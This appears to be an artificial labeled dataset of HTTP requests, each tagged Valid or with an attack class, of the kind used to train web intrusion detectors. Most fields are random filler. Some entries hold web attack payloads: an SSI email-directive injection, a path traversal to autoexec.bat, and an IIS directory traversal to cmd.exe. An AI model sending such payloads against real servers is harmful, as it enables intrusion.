GET /nsdIIP9/pe.jsp?likeDf2UpositionPf=graaeeblsaoteqrh&jnxleyayalcOrx=8&catJ5871Nk=7209566100&tndar9nnehn=u8yIahxuRlanee&ogeeow=xht1eohlT&vKCnph-=8732&Te3=%3At7&htTeeempnel3lee=ramaihSstTac9e%3E&nonnor6th=y%25uPln&lJsystemaTv=wofy1 HTTP/1.0
Host: www.iOn9tamu.de
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 102.147.145.53
Cookie: snmSnAo=linkee;uinput7WnullGv1y=2208637;bai70ondlt=988;raul=610602582
Cookie2: $Version="94"
Date: Sun, 18 Sep 05 20:16:25 UTC
ETag: "37Du@YuAnBeW63f@"
Expect: sE9tIn
From: 2rbOee@urmb.de
If-Modified-Since: Fri, 09 Jul 04 19:34:54 UTC
If-Unmodified-Since: Mon, 05 Jun 06 07:09:58 UTC
If-Match: "_atucQgMH@H0dlST"
If-None-Match: "@RiV@pS8p0_fbPJM09-"
If-Range: *
Max-Forwards: 678
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: tshs Axeteu=gear
Authorization: Digest nonce
Range: 7-,1-2,575-73
Referer: /yphs3lzn/emfie.tar.gz
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/3.4 (compatible; m1oe7UMos; Win98; 2eetetudl; tuaeoou7to; saoe)
UA-CPU: x86
UA-Disp: 0205,052,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 765x642
Via: 6.1 170.93.70.244, HTTP/6.8 www.kttt.jpeg:82896
Transfer-Encoding: deflate
Upgrade: 2nos5s/7.0
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 48.85.205.201
X-Serial-Number: 54263
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10009
Start - Id: 39391
class: SSI
GET /tVkBW/hZhfb7vkUI7YZJr9B0Hs/hV/me1h9ooRedbi7eem/formreplacega/d3UL-/uV06149nLq/rnmze/Husrry5home.N0.png?Q2uM=08664271&Xidrempluc0n=6T_u&sndtevdsegA=s0iQEAx-&iYoeadiSeura=%3C%21--%23email+fromhost%3D%22www.usnsht.com%22+tohost%3D%22mailbox.jzeen.com%22+message%3D%22nRyna+aficrfw+din+eroU%22+fromaddress%3D%22gz2sir.com%22+toaddress%3D%22rlfoo.srI9.com%22+subject%3D%22le%22+sender%3D%22ae.com%22+replyto%3D%22mqivhO.com%22+cc%3D%22esm%22+inreplyto%3D%22do+RnA+vtthee%22+id%3D%22nalmail%22+--%3E&3rtzblo6mnmtiRa=ctBtNaeueet&Lnezw=6503854660 HTTP/1.1
Host: www.ttoigfi.cz
Connection: close
Accept: application/*
Accept-Charset: iso-8859-7;q=0.2, iso-2022-kr, cp-936;q=0.0, windows-1257;q=0.6
Accept-Encoding: identity, gzip;q=0.4, gzip;q=0.5, compress
Accept-Language: h-s, a4r8ua-q6a;q=0.8
Cache-Control: no-transform
Client-ip: 247.66.9.211
Cookie: se=2ncqsnome;hI=691475;2SVEWOYW=Benh ]t&Uck%se;cwaeosvs9tl=Fc7fgxer;Aduyk0libctw19=uqfsojhfromGgi
Cookie2: $Version="42"
Date: Tue, 22 Nov 05 08:34:11 CET
ETag: "lDDdeICjGfQ3NK@NFBX"
Expect: 100-continue
From: 2taerbd@7tinee5s.fr
If-Modified-Since: Wed, 30 Nov 05 18:41:36 GMT
If-Unmodified-Since: Sat, 18 Dec 04 09:05:57 CET
If-Match: *
If-None-Match: *
If-Range: "bbwZD.0DgRNFUKP7"
Max-Forwards: 1
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: reenr ueer=altyt2
Authorization: NTLM eXJlSWNidHNhdXRzcmVyZU5zUmUxaDdyRWJFZWx3bm9rVGVseWJUdGll
Range: -7403,569103-
Referer: /sece/uety/qokaotSi.avi
TE: gzip,trailers,chunked
Trailer: Accept
User-Agent: Mozilla/2.3 (X11; U; Open BSD i586 5.0; nH-nm; rv:1.0.9) Gecko/17579841
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 0.2 124.162.206.142, 8te/4.0 www.to9hhxn.shtml, 8.2 www.ei5nemn.shtml
Transfer-Encoding: moig
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 546 www.raiagiki.htm "ohfiere5i" "Sun, 09 Jan 05 20:08:05 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39391
Start - Id: 16660
class: Valid
GET /njTfmNevOQqwc_h6hCa/r8Lslnonsmedhe/iOzgIWeC7LN-/jeotA96R3hntsep1at/Km-5scriptM9bwget/BYvbscriptpUQpRD.pl?ebrnfesrr=ogroup+byt&udtbsf=ii4iinoshtacces&sdewinWswiutwAz=3394208352&o47atr5r9aretjd=tcSX&cuWw=riast&v7VZskUHRwAp=9205&aeiE9oC=mDjJsUq&nLHUt8R0a=etcS&elnsroc=oeap&rn2ss=%26rt0o&ntwDihnelgyoel=2aichtlct&sOFyQcL5Qna=nxZ539QU HTTP/1.0
Host: 126.79.121.73
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: 3-nasleslu, ecenk-r;q=0.9, t9aoE-rhtoeoop, eo-lssgaaoi
Cache-Control: max-stale=66
Client-ip: 20.79.158.131
Cookie: eLLcme=YvetEajodonidTex;rrnnibo78rks=rhrwindow.openee
Cookie2: $Version="38"
Date: Fri, 07 May 04 07:11:22 GMT
ETag: W/"ZRksEfMqur5e244Egpfk"
Expect: 100-continue
From: sieqCi@mzS0qae.it
If-Modified-Since: Tue, 27 Apr 10 10:52:00 GMT
If-Unmodified-Since: Mon, 27 Aug 07 19:50:36 GMT
If-Match: "TYEp2zFj.m-iezMt9EQ"
If-None-Match: "We0XBV1Udgx0.m1@QO"
If-Range: Sat, 29 Sep 07 06:46:47 CET
Max-Forwards: 77
MIME-Version: 7.1
Pragma: naye=ws0o0g
Proxy-Authorization: Basic cmVvZm86ZWRkbjI=
Authorization: de8xH Amxs5=Berma
Range: -752
Referer: /notdeeA/rfTwO.asp
TE: chunked;q=0.6
Trailer: If-None-Match
User-Agent: 9-z-bePW http://www.1dx0a.de
UA-CPU: x86
UA-Disp: 950,9201,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5729x0287
Via: FTP/2.7 192.34.32.68:53, 2.9 112.53.51.98, HTTP/7.8 179.124.42.245
Transfer-Encoding: compress
Upgrade: ombmMg/6.7
Warning: 890 www.nUiou.jpeg "oe52aLer" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6793102
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16660
Start - Id: 36177
class: PathTransversal
GET /mNntl0dstgahryiina/mKYv14Facy86qsn0VC/tGo3AkqgHh/vvrNvQ-GNw3.html?9un=Ln+Itrs+e9ect%3Ahf&e8iasukCi5=98749&71Rn2tt1irr=9125350037&striL=delete%2Fqenh%3C%7C%5Drelsea%28y&o1temopbeh=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&fshnhbaraliense=124882&swayi=a3yP8hL-gT&SdmYN1xCslikeF=4192&nph-tS5positionOn=e%3F&o3aqdonoAeu=g3s&uns=386449296&vcnnnWtaRS=9771&tsj=03006 HTTP/1.0
Host: www.8c9innnq.uk
Connection: 4oEW
Accept: text/*
Accept-Charset: gb2312;q=0.7, macintosh;q=0.6, x-mac-korean;q=0.1
Accept-Encoding: gzip;q=0.6, identity;q=0.1, compress;q=0.9, identity
Accept-Language: *
Cache-Control: min-fresh=8058
Cookie2: $Version="250"
Date: Wed, 20 Dec 06 24:21:34 UTC
If-Match: "461lVokZfnuljUdsRpv"
If-Range: "YgyLXsY3Rx4H6Fr@x"
MIME-Version: 4.5
Pragma: no-cache
Authorization: NTLM ZW5kaW15bzhldndBZWlBdWxqaGV1bHJ0cGV0bmRzaTRjeXQ=
Referer: http://www.l5oxalt.be/agAnmN.shtml
Trailer: Accept
User-Agent: Cvot0neu1 (o2zvdMeEr; ev-cIX.g@v; dq29h9fqFW; ewt4WnR684)
Via: tt9he/7.2 25.200.187.170, HTTP/9.7 13.73.226.230:5436
Transfer-Encoding: identity
Upgrade: yio/9.6, huzje/3.6, uaeeO/6.2
X-Forwarded-For: 143.21.25.63

null

End - Id: 36177
Start - Id: 18127
class: Valid
GET /at3QidMmzcfs/ncrwitnEtt/RnTe/dT7execqandrSG/5TVs3yieeletieero/f4e/u9ca/8vhZBZUrcW8v/nsrns3eiarulqnn4oiaf.html?lelSatp=6dtd5yt%2FdaedlD&ultun8=nuC%7EeyeexecsSoecho+gLsvv+h&cgaoncsdiebtole=o4e HTTP/1.1
Host: 38.183.101.7:3
Connection: Nvnleal4
Accept: */*;q=0.0
Accept-Charset: cp-932;q=0.2, x-mac-ce, iso-10646-ucs-2;q=0.5, x-mac-greek;q=0.9, x-mac-icelandic
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 102.113.167.199
Cookie: eynndaere8tl=y-uBo2kPas;4autoexec64Nz1k_=;;nRagp5h2eOvn4n=or6)e7iiherTes;oHys7oe8=49456133;e5tGo=nshya;i7ttvn=etf
Cookie2: $Version="10"
Date: Sat, 06 Dec 08 07:48:21 CET
ETag: W/"rhcS_4hO9_XEsNz8dd"
Expect: 100-continue
From: hwDyshr1@ecneonN.be
If-Modified-Since: Thu, 18 May 06 14:55:22 CET
If-Unmodified-Since: Sun, 10 Jan 10 03:53:40 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 19 May 09 10:51:52 GMT
Max-Forwards: 1
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: iisE najhde=go0akSs
Authorization: Digest response="Ad8E23477426A4d43BCEB1CbCdbD870f"
Range: 24-,21839-647
Referer: /tohhhea8/qbmaee.tar
TE: trailers
Trailer: Range
User-Agent: eOMa (sY.Vrc_; twcur7; aJ2FBX; unn0Tse3Ux; txQlZ9xl)
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4077x543
Via: 5.5 www.sbfeoee.tiff, 5.4 185.137.71.2, 6.7 255.110.45.83
Transfer-Encoding: gzip
Upgrade: 8rhetT/2.2, 0fno/6.2, Swi/2.0, ehe/1.3, iaeicr/1.5
Warning: 432 www.uatfoT.gif "ojer8gtnteao0ut" "Wed, 24 Mar 10 12:45:46 GMT"
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 0610755676490078
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18127
Start - Id: 32274
class: Valid
GET /anh/p4idu7mk3.pl?NXlocationz4T=znfh&isshtie=74763369&NltMdsaHneest=%7E+&awaahc09he=tTI1dF&XW9passthru@SshutdownXhavingO1E=331131&4heojjaa7bi=055&eih0asi=between1csarIaRutniq&1D_DJ92fadmin=0660238&DEF5admin=126&rnx=ndroptmpihomes%3Aep4window.openr%243&oiodeoo=Tw1de8aeo&l1tmdr11os=paSz_9Sdu5&z1yxd=dJFA4-O6kxD&fdeleteH8mBvs=b3%7Etg&d9inozMinetn0=0dplogToo%24ndocumentt HTTP/1.1
Host: www.ealee.cz
Connection: lchrDih0
Accept: audio/basic, video/quicktime;q=0.5, audio/x-wav
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 21.59.244.222
Cookie: orevalhttpskVstdinZ=eNnirarr;MWLincludev=sedibe;aioh=i4ofehruteTe;itteHid=eyei@
Cookie2: $Version="0"
Date: Mon, 19 Mar 07 02:42:17 GMT
ETag: "wIUb9wnbyvuu9O8FvHJ"
Expect: 100-continue
From: mnonn5h@wlv1.be
If-Modified-Since: Tue, 05 Aug 08 13:22:12 UTC
If-Unmodified-Since: Thu, 12 Apr 07 08:18:19 UTC
If-Match: *
If-None-Match: "@i2GL2-LgI1I5CTTK"
If-Range: Tue, 18 May 04 14:03:51 GMT
Max-Forwards: 4622
MIME-Version: 9.5
Pragma: dyEoIl=tyrp
Proxy-Authorization: Digest response="3238f2b6e604C2BF845fBD1615DdA4Ea"
Authorization: Digest cnonce="1lmutp"
Range: -265,3-,-2
Referer: /lVophtr/d6an/eNmebe/yefceae/rtdAmY.gif
TE: trailers
Trailer: Accept-Encoding
User-Agent: cresios/1.8
UA-CPU: x86
UA-Disp: 090,0267,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3225x292
Via: 2.6 www.sriF.gif, HTTP/4.8 www.a5ahbh.tiff:247
Transfer-Encoding: yoUlo
Upgrade: igmn0b/4.9, aorfth/1.2, srr/7.4, mp7/8.9, npq/6.9
Warning: 276 144.197.192.204 "hsEwst6bs9l" "Wed, 19 Mar 08 20:42:32 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 1683204124679944
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32274
Start - Id: 31959
class: Valid
GET /j_48mbmsZ8sOl1X54z/smyrw6tntaA/eKlKZxQuDT.jpg?enmf2heubrpkG=ler&seRlaanlbRl=dno&se7=o HTTP/1.0
Host: www.8F5u.ch
Connection: LtmshO
Accept: */*;q=0.8
Accept-Charset: windows-1258;q=0.2
Accept-Encoding: *
Accept-Language: ayeenod-tzmadai, 8neaMnoe-ttb3a, loti-ntau6ro;q=0.5
Cache-Control: max-stale=793
Client-ip: 156.28.101.36
Cookie: aanw=1updatendivs;ymhhyhsen=0ti;jas=bOctmbvht
Cookie2: $Version="097"
Date: Fri, 11 Jul 08 06:07:27 UTC
ETag: "0XxcHSFnklSQOZU6Zub"
Expect: oh4tn
From: wamiac@4nepios.fr
If-Modified-Since: Mon, 24 Jan 05 07:46:02 CET
If-Unmodified-Since: Sat, 27 Nov 04 12:46:10 CET
If-Match: *
If-None-Match: *
If-Range: "txdM4tx2JvkhQoE"
Max-Forwards: 99
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: etsnds WdnRHatk=rhdNp
Authorization: NTLM ZWExZGhvY3RlbWV1b29sd3BlY3phdm9vaXNPZHJibnllZW5hZWFlYmFz
Range: -771267
Referer: /anhrb/talAs/um08r.sh
TE: chunked;q=0.2,trailers
Trailer: Pragma
User-Agent: Mozilla/4.5 (compatible; MSIE 8.0; Open BSD i586; sbahotlne; ao3Iy; oeodntha)
UA-CPU: Sparc
UA-Disp: 3482,947,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3303x4060
Via: 8.9 www.lsoa.shtml
Transfer-Encoding: mG5en
Upgrade: aceem/7.4, Aoax5/9.8, cdea/3.1, bed2e/6.9, Uiipl/0.8
Warning: 148 www.psN0t.tiff "Ha8aevrPaReu2aaa" 
X-Forwarded-For: 24.237.69.183
X-Serial-Number: 9668437330474941
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31959
Start - Id: 28888
class: Valid
GET /2httpPureplacemmrITU/55j/nKrR/9@lGJUhTD/Q.IPzp5q/yHwlsaRLXNG4J@EaM-EZ/zm18z2yXSApCL/yI5hnZB/iL@/QgZ2/n4tm0crsndte5dcun1/nM4pyli.htm?2o=sr&os1ikesfeze=4891301&6YwL@M1uaR=rmWa&eaD=oe7ntst&nq7ab4=T HTTP/1.1
Host: 199.1.231.145
Connection: close
Accept: */*;q=0.2
Accept-Charset: cp-936;q=0.5, iso-8859-4;q=0.3, iso-8859-15;q=0.7
Accept-Encoding: deflate;q=0.5, gzip;q=0.3
Accept-Language: t9s-oisspf6o;q=0.3, ef1e-2quItsm;q=0.2, qeIr-esirw
Cache-Control: no-store
Client-ip: 77.4.9.206
Cookie: wnme= rcsea8 d(iElink&;ho=sttL1es7rDhh;bxo3ux1aeydo=89513397;kgOGzeAz.r=P1e0t;oRrr=s3of5mL3hhnnaa;ptismeits76t=b 
Cookie2: $Version="8"
Date: Sun, 17 Jul 05 11:42:58 UTC
ETag: W/"08OfWCGUYYg7aGs_@hp"
Expect: yeRBszr
From: 4zbw@syof.net
If-Modified-Since: Sat, 13 Mar 04 23:36:35 GMT
If-Unmodified-Since: Mon, 19 Apr 04 08:28:36 CET
If-Match: *
If-None-Match: "dgWJ8McAp0y4mx0"
If-Range: Mon, 26 Jun 06 06:57:35 GMT
Max-Forwards: 12
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic OXhvZW9lOmVkZVQxZA==
Range: 0-78,-19014
Referer: /m3noDe/dzesazrt/cnEhn.doc
TE: deflate,chunked,chunked;q=0.7
Trailer: If-None-Match
User-Agent: Mozilla/8.9 (Machintosh; U; Mac OS X 9.8; 5n-da; rv:7.6.3) Gecko/24035847
UA-CPU: x86
UA-Disp: 647,902,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 122x5513
Via: 2.6 9.97.32.7, rcys/2.2 146.91.150.243, HTTP/5.7 74.209.74.51:0
Transfer-Encoding: deflate
Upgrade: sippk/3.0, sieesd/6.3, eUhlW/5.4, r57ml/6.9, oriie/9.1
Warning: 329 11.139.34.162:188 "8nhuetrhl" "Fri, 25 Jun 04 14:18:11 CET"
X-Forwarded-For: 160.62.173.241
X-Serial-Number: 410148
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28888
Start - Id: 43806
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 202.240.205.184
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-2022-jp, iso-8859-4;q=0.8, iso-8859-8, windows-1250;q=0.7, isiri-3342;q=0.8
Accept-Encoding: identity;q=0.0, compress, gzip, identity, compress
Accept-Language: fhy-htr;q=0.5
Cache-Control: max-age=918
Client-ip: 69.5.212.169
Cookie: arjat=fromighttp;oq8rude=wN5D7yB;Tj0p=ouziigrtnufde;@W0OnexecG5aR=7niHtls;wpsJuR=36159532;XAYEkK.gphp=Tlr t
Cookie2: $Version="9"
Date: Mon, 20 Nov 06 13:38:28 GMT
ETag: "@ZVFdx6HfZRC.m2OXS8f"
Expect: u9re=alahjAwN
From: uZkpt@nesht4Iih.ch
If-Modified-Since: Sat, 09 Dec 06 22:34:46 GMT
If-Unmodified-Since: Sun, 31 Jan 10 22:26:55 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 87
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest uri=/luwef4L/t5qldo/ETagETyH.fgf
Authorization: qutgt3 dhItvrl=r0cr5f
Range: 904036-,02113-35,44499-
Referer: /N6tljdce/peoD.png
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.4 (Windows; U; Win98 6.2; ao-En; rv:9.0.2) Gecko/20846143
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 697x813
Via: 3.1 7.18.27.109
Transfer-Encoding: identity
Upgrade: Rteoa/6.1, seif/8.2, nnyoe1/3.7, ai7g/8.2
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43806
Start - Id: 26167
class: Valid
GET /nAEkDcsLCICiTugrAN/sTnxaymsiad4tt/8y.bin?x3KLZ=96136 HTTP/1.0
Host: www.ee70ot.net
Connection: AoNeh4
Accept: image/jpeg, text/*;q=0.7, audio/x-wav;q=0.6
Accept-Charset: euc-tw;q=0.7, big5, euc-tw;q=0.5
Accept-Encoding: 
Accept-Language: n3oecer-i
Cache-Control: no-store
Client-ip: 110.150.5.172
Cookie: crmtirasbuc8u=cDkn0Q;DWlQ-pa7GIZA=vyX5;niaecDias2td=inagtsmsu;drisvbe7mahem=a9passthruhsystemRer-r FcLdt;7iwLaheacritrtm=5185;uritnnmmx=6poiS/|ustdinhtaccess formlocationed&dh
Cookie2: $Version="7"
Date: Mon, 26 Jan 09 08:19:14 UTC
ETag: "BEYBBGwLFnk4PHTl3"
Expect: 5w5dueI=iiot
From: tiem@gaat5h.cz
If-Modified-Since: Sat, 01 Aug 09 03:06:27 UTC
If-Unmodified-Since: Mon, 26 Apr 10 06:27:39 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Jul 09 18:00:08 UTC
Max-Forwards: 8138
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM b3RnY291RWVubGUwdHplaGV1ZTd0dGF1emw2eW90MHRvcw==
Authorization: Digest opaque="Gonohwud"
Range: 18-
Referer: /ejtlBy.sh
TE: trailers,gzip;q=0.8
Trailer: TE
User-Agent: tAn9uscl (i_Ew57j; dcFbzhflU)
UA-CPU: 68000
UA-Disp: 5551,026,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7580x3767
Via: FTP/0.5 211.65.121.206, 2.1 www.g5pls.css, 2.4 www.qlrakww.htm
Transfer-Encoding: identity
Upgrade: sbthb/1.3, ctm/5.8, jMsOp/9.9, 0wrop/6.2, 2uaa1/2.7
Warning: 091 41.251.186.23 "rRst8cre" "Sat, 21 Feb 04 24:26:15 GMT"
X-Forwarded-For: 102.26.95.103
X-Serial-Number: 77624336
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26167
Start - Id: 554
class: Valid
GET /mSzgEaiRP/eU-BV/n7id/wPD5gCv2t/sWniyiniaco6x/6M2F/ooYN/udA6selosruolonr05Lp/qrutaiLsegfrRheEfE.tiff?tfmnesuiysoefr=Oaarra74a+&sqi=293854761 HTTP/1.1
Host: www.4ndc.uk
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.4, koi8-r
Accept-Encoding: gzip;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 19.12.1.144
Cookie: mt=5rajcUiteeat;5ilAeledab=2;khs=8176422;13c=tnnrUsjThmmo
Cookie2: $Version="404"
Date: Wed, 24 May 06 07:35:19 UTC
ETag: W/"z_PlEuMD@OYhaZFNhw"
Expect: 8mlnolre=hrua
From: pasea@rsg3kzoak.biz
If-Modified-Since: Sun, 06 Apr 08 21:28:29 CET
If-Unmodified-Since: Wed, 16 Jan 08 10:21:09 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Apr 08 10:05:53 GMT
Max-Forwards: 3
MIME-Version: 6.5
Pragma: aeks='5'
Proxy-Authorization: Basic N2dtVGFzOjh4cnRw
Authorization: Basic cWVvZTpydG9sYWVl
Range: 5753-
Referer: /sUeasei/vetrrao/eode/uhpog/rtincoeu.txt
TE: deflate,chunked;q=0.1,gzip
Trailer: Accept-Charset
User-Agent: s5bH6xQp-9 http://www.ttaIKK.fr
UA-CPU: MIPS
UA-Disp: 7032,830,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 275x6652
Via: 7.7 166.14.92.232, 1.6 www.eOwcgtet.gif, acie/0.8 219.169.46.12
Transfer-Encoding: compress
Upgrade: tth/7.2, dia/5.2, 17ohEa/5.1, dn2/4.0, lsaabo/1.1
Warning: 256 www.fsdPc.htm "rHeIzlrwN64st" "Sun, 11 Jul 04 05:24:39 CET"
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 0666131259
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 554
Start - Id: 19976
class: Valid
GET /nusui1Imiesyaf/idspeSooossmEhh.gif?8DeshiSvFnw3=%28T&RWJnfVXH6S9z=84&rL04vbscriptUo41perl=2018089442&tst=sl%26aulLen&egnatlpum=passwdtdvQsrg&uOtIpGvE7tina=olhKi-PV5G.x&ytiEmRlTNtu=27&Tme=166 HTTP/1.0
Host: 239.156.112.143
Connection: keep-alive
Accept: video/mpeg;q=0.3
Accept-Charset: x-mac-japanese
Accept-Encoding: 
Accept-Language: otomaee-d;q=0.2, ibh3her-0i;q=0.5
Cache-Control: ne2or='adMayw'
Client-ip: 37.116.233.151
Cookie: evg=3betweeni+wt;G58l2<s;sx=30048826
Cookie2: $Version="231"
Date: Thu, 11 May 06 15:09:13 UTC
ETag: "0PTCgOhFPB@rwN7"
Expect: 100-continue
From: z3on9@atfseid.cz
If-Modified-Since: Sun, 08 Feb 04 23:34:07 GMT
If-Unmodified-Since: Thu, 06 Sep 07 11:15:40 CET
If-Match: "HQA1hJ2nMhbu_pD"
If-None-Match: "HrvdU7TyPg9CTxkLc"
If-Range: Mon, 18 Oct 04 15:29:32 UTC
Max-Forwards: 35
MIME-Version: 3.2
Pragma: cE2Eol=matrah
Proxy-Authorization: NTLM bm56ZW9haG4wbXNhb250ZWJoZWhobXRoemR3dGhsa3R0dXcxdGVuc3JhZWxsaQ==
Authorization: Basic VDBhb3djdGQ6c2F6TlRobm8=
Range: -175214
Referer: /eoDbko/nmoHaof.cfm
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.7 (Windows; U; Win98 9.8; mz-e5; rv:0.8.7) Gecko/52535864
UA-CPU: StrongARM
UA-Disp: 773,5885,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1394x7760
Via: HTTP/8.3 www.igqhz.js, HTTP/3.5 www.tHwrm.htm
Transfer-Encoding: blreot; Aucee=iDgt
Upgrade: scjah/2.9, rqic/8.5, Eucg/8.4, 50h/6.8
Warning: 269 www.sio9tfe.jpeg "ertsEceeNmilreasie" 
X-Forwarded-For: 39.120.128.67
X-Serial-Number: 81008512960196254
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19976
Start - Id: 21008
class: Valid
GET /suisRrhieemqidmv/JKNhkxtermBjKiT/ahsnntietohgnsh/pCMpnrHIuAFiXlW/aSehuUetIwe/88fsl6uitoetdh.png?tnhIrJ=daHZBh-ng&saoquwn9teecce=NoastylexeIgeIo+aonetcatys%3F&eknedtsursi=Waghm-2a+kwconnectqa HTTP/1.0
Host: www.ipbonon.de
Connection: close
Accept: application/postscript;q=0.1
Accept-Charset: ks_c_5601-1987;q=0.5, iso-8859-5;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 241.58.191.36
Cookie: 3ez=$access_logusrdocumentt;0itokarsonha=whn;htrj6Vtaam=2SFr;tugrsded9eI4uh9=|gnph-c2;xxceseeKneu7=bup
Cookie2: $Version="909"
Date: Thu, 24 May 07 14:48:01 GMT
ETag: "yS7jeWo.CP_ngWA"
Expect: esiontj=ri4dlbaa
From: sooel@tsc9yp.it
If-Modified-Since: Wed, 04 Feb 04 20:48:40 CET
If-Unmodified-Since: Sun, 18 Jul 04 20:34:50 UTC
If-Match: "46KX2u.BNfi0JlsPwkQj"
If-None-Match: "-jVTXlwhUNsDbkJME"
If-Range: *
Max-Forwards: 7
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest response="a0f19d231EFdE2b1dCCD9A5Daa596122"
Authorization: NTLM YWVlaWN4ZG9zMWFnZWF0dEdUaDczcGFmbmJzYWFycnpyZW4=
Range: 9864-14,-53
Referer: http://www.oesod.fr/Aceeto/plChm/d9ss/f4nthyon.sh
TE: gzip;q=0.7,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: tOjl1Ny http://www.nebt.cz
UA-CPU: 68000
UA-Disp: 0934,6028,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 985x390
Via: 1.7 www.hniao.jpeg, HTTP/6.2 9.52.205.77:6912, FTP/7.1 www.amac.shtml
Transfer-Encoding: compress
Upgrade: inir/1.9, 5xetc/4.2, 9hdwag/8.3, hph/1.7
Warning: 969 2.97.52.123 "vehhjWg" 
X-Forwarded-For: 255.69.11.121
X-Serial-Number: 72612328248662320095
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21008
Start - Id: 41399
class: SqlInjection
PUT /sgWkj3Cz98kN.KLOuHM6/hywat0iwtistie/tyforIAdeuopnweEynm/y15/6fjhftaNnc1aithEuaee.nsf? HTTP/1.1
Content-Length: 303
Content-Language: emfr,oxs2kans
Content-Encoding: deflate
Content-Location: http://www.kwn2.cz/iNbdtr/iebea/xbiaisis/roSs3n.tiff
Content-MD5: ZWVUdGFmQkx3RnNsOHlmYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Sep 08 03:14:32 UTC
Last-Modified: Sun, 03 Apr 05 22:31:35 UTC
Host: 30.178.188.124
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 87.5.203.76
Cookie: n0=7597;idt39Xks='ta;na=82;btisaytrk0cH=27711540;rfThihr=Oetrasleax
Cookie2: $Version="59"
Date: Mon, 04 Jan 10 13:08:41 GMT
ETag: "lIiRlIPKte_9Hpgpj"
Expect: 5ERmu=ncdsee
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Tue, 27 Jul 04 03:36:56 GMT
If-Unmodified-Since: Fri, 06 Nov 09 18:59:22 CET
If-Match: "c3uN-WCiKsOryR@YO4"
If-None-Match: "VudQT9_2hoiwxMm"
